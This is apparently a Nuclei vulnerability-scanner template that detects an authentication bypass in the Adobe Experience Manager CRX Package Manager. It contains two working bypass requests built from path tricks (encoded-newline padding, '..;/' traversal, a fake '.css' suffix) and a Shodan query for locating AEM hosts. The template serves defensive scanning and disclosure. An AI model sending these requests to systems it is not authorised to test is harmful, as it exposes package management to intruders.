nuclei-templates/misconfiguration/aem/aem-crx-bypass.yaml

49 lines
1.6 KiB
YAML

id: aem-crx-bypass
info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
severity: critical
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe
requests:
- raw:
- |
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'buildCount'
- 'downloadName'
- 'acHandling'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# Enhanced by mp on 2022/04/22